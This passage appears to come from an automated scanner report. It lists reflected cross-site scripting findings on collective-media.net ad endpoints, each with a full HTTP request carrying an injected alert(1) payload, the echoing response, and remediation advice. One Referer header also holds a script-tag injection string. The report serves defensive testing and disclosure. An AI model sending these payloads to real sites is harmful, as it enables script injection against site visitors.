Host:   http://a.collective-media.net
Path:   /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cce9e'-alert(1)-'f72cf659efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200?&cce9e'-alert(1)-'f72cf659efc=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 483
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200?&cce9e'-alert(1)-'f72cf659efc=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.45. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de957'-alert(1)-'86a9ffedd71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;sz=728x90;net=bzo;ord=1296226792127; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7406
Date: Fri, 28 Jan 2011 16:37:20 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-86809834_1296232640","http://ad.doubleclick.net/adjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-86809834_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nur
...[SNIP]...

4.46. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ae7'-alert(1)-'f6babba3ff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Fri, 28 Jan 2011 16:37:19 GMT
Content-Length: 7355
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-23828810_1296232639","http://ad.doubleclick.net//bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF;net=bzo;u=,bzo-23828810_1296232639,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.
...[SNIP]...

4.47. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28bed'-alert(1)-'6aa23ec8461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7355
Date: Fri, 28 Jan 2011 16:37:20 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-67058863_1296232640","http://ad.doubleclick.net//bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461;net=bzo;u=,bzo-67058863_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.spor
...[SNIP]...

4.48. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdbf4'-alert(1)-'424982c1ee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.847.CD39C435/ATF?bdbf4'-alert(1)-'424982c1ee6=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7358
Date: Fri, 28 Jan 2011 16:37:18 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-18342662_1296232638","http://ad.doubleclick.net//bzo.847.CD39C435/ATF?bdbf4'-alert(1)-'424982c1ee6=1;net=bzo;u=,bzo-18342662_1296232638,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.sp
...[SNIP]...

4.49. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ff88'-alert(1)-'0d4cdd2d236 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.847.CD39C435/ATF;sz=3ff88'-alert(1)-'0d4cdd2d236 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:18 GMT
Connection: close
Content-Length: 7388

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
/adj/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-77437619_1296232638,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;sz=3ff88'-alert(1)-'0d4cdd2d236;contx=none;dc=w;btg=bzo.sports_l;btg=bzo.c9q;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l?","3ff88'-alert(1)-'0d4cd
...[SNIP]...

4.50. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c29a3'-alert(1)-'a7c73f96421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:34 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:34 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT
Content-Length: 8164

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-22784626_1296266074","http://ad.doubleclick.net/adjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22784626_1296266074,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-
...[SNIP]...

4.51. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a69b'-alert(1)-'5df7ba57f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:35 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT
Content-Length: 8155

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-54069803_1296266075","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;net=iblocal;u=,iblocal-54069803_1296266075,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports
...[SNIP]...

4.52. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c1e1'-alert(1)-'5c79f4e4b95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:36 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT
Content-Length: 8156

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-25417174_1296266076","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;net=iblocal;u=,iblocal-25417174_1296266076,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.wea
...[SNIP]...

4.53. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50801'-alert(1)-'61d025e556e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience?50801'-alert(1)-'61d025e556e=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7549
Date: Sat, 29 Jan 2011 05:19:36 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-55331544_1296278376","http://ad.doubleclick.net//iblocal.revinet.bostonherald/audience?50801'-alert(1)-'61d025e556e=1;net=iblocal;u=,iblocal-55331544_1296278376,11d765b6a10b1b3,none,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm
...[SNIP]...

4.54. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8835d'-alert(1)-'23dd9848d70 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=8835d'-alert(1)-'23dd9848d70 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Content-Length: 8099

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
cal;u=,iblocal-53332311_1296266066,11d765b6a10b1b3,none,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=8835d'-alert(1)-'23dd9848d70;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;
...[SNIP]...

4.55. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f09'-alert(1)-'5901c85919a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj39f09'-alert(1)-'5901c85919a/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
